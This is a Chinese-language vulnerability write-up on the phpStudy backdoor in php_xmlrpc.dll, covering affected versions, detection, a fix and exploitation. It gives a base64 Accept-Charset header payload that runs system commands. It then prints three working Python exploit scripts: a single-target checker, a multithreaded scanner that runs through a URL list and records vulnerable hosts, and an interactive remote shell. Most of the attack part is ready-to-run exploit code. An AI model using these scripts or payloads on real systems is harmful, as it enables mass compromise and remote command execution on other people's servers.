0x00 简介
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境
0x01 漏洞概述
使用广泛的PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门(来自雷神众测)
0x02 影响版本
phpStudy20161103版本:
php5.4.45与php5.2.17
phpStudy20180211版本:
php5.4.45与php5.2.17
0x03 环境搭建
公众号回复“phpstudy环境”,解压后无脑安装即可
0x04 漏洞利用
首先检测后门是否存在,后门位置:
\phpstudy\PHPTutorial\php\php-5.2.17\ext\
\phpstudy\PHPTutorial\php\php-5.4.45\ext\
找到目录下的php_xmlrpc.dll文件,用文本打开,搜索eval关键字:
如图所示,可判断存在后门
然后用存在漏洞的PHP版本进行启动服务,我使用的是5.4.45,切换版本的位置如图
然后随意访问一个php文件,拦截数据包,添加如下的请求头字段:
accept-Encoding中逗号后面的空格要去掉
Accept-Charset为system('ipconfig')的base64编码
accept-Encoding:gzip,deflate Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==
repeater重放数据包,成功触发后门:
0x05 修复方式
从PHP官网下载原始php-5.4.45版本或php-5.2.17版本,替换其中的php_xmlrpc.dll,下载地址:
https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip
https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip
检测工具:
https://www.xp.cn/zijian/
后门利用脚本:
#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/
import base64
import requests
import threading
import queue
print("======Phpstudy Backdoor Exploit============\n")
print("===========By Qing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")
payload = "echo \"qing\";"
payload = base64.b64encode(payload.encode('utf-8'))
payload = str(payload, 'utf-8')
headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9',
'accept-charset': payload,
'Accept-Encoding': 'gzip,deflate',
'Connection': 'close',
}
def write_shell(url,headers):
try:
r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
if "qing" in r.text:
print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')
with open('success.txt','a') as f:
f.write(url+'\n')
else:
print ('[ - ] BackDoor failed: '+url+'[ - ]\n')
except:
print ('[ - ] Timeout: '+url+' [ - ]\n')
url = "http://xxx"
write_shell(url=url,headers=headers) 多线程
#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/
import base64
import requests
import threading
import threadpool
print("======Phpstudy Backdoor Exploit============\n")
print("===========By Qing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")
def write_shell(url):
payload = "echo \"qing\";"
payload = base64.b64encode(payload.encode('utf-8'))
payload = str(payload, 'utf-8')
headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9',
'accept-charset': payload,
'Accept-Encoding': 'gzip,deflate',
'Connection': 'close',
}
try:
r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
if "qing" in r.text:
print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')
with open('success.txt','a') as f:
f.write(url+'\n')
else:
print ('[ - ] BackDoor failed: '+url+'[ - ]\n')
except:
print ('[ - ] Timeout: '+url+' [ - ]\n')
# url = "http://xxx"
# write_shell(url=url,headers=headers)
def main():
with open('url.txt','r') as f:
lines = f.read().splitlines()
task_pool=threadpool.ThreadPool(5)
requests=threadpool.makeRequests(write_shell,lines)
for req in requests:
task_pool.putRequest(req)
task_pool.wait()
if __name__ == '__main__':
main()
#线程队列部分
# th=[]
# th_num=10
# for x in range(th_num):
# t=threading.Thread(target=write_shell)
# th.append(t)
# for x in range(th_num):
# th[x].start()
# for x in range(th_num):
# th[x].join()交互式
#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/
import base64
import requests
import threading
import threadpool
import re
print("======Phpstudy Backdoor Exploit---os-shell============\n")
print("===========By Qing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")
def os_shell(url,headers,payload):
try:
r = requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10)
# print(r.text)
res = re.findall("qing(.*?)qing",r.text,re.S)
print("[ + ]===========The Response:==========[ + ]\n")
res = "".join(res)
print(res)
except:
print("[ - ]===========Failed! Timeout...==========[ - ]\n")
def main():
url = input("input the Url , example:\"http://127.0.0.1/\"\n")
payload = input("input the payload , default:echo system(\"whoami\");\n")
de_payload = "echo \"qing\";system(\"whoami\");echo \"qing\";"
if payload.strip() == '':
payload = de_payload
payload = "echo \"qing\";"+payload+"echo \"qing\";"
payload = base64.b64encode(payload.encode('utf-8'))
payload = str(payload, 'utf-8')
headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language': 'zh-CN,zh;q=0.9',
'accept-charset': payload,
'Accept-Encoding': 'gzip,deflate',
'Connection': 'close',
}
os_shell(url=url,headers=headers,payload=payload)
if __name__ == '__main__':
main()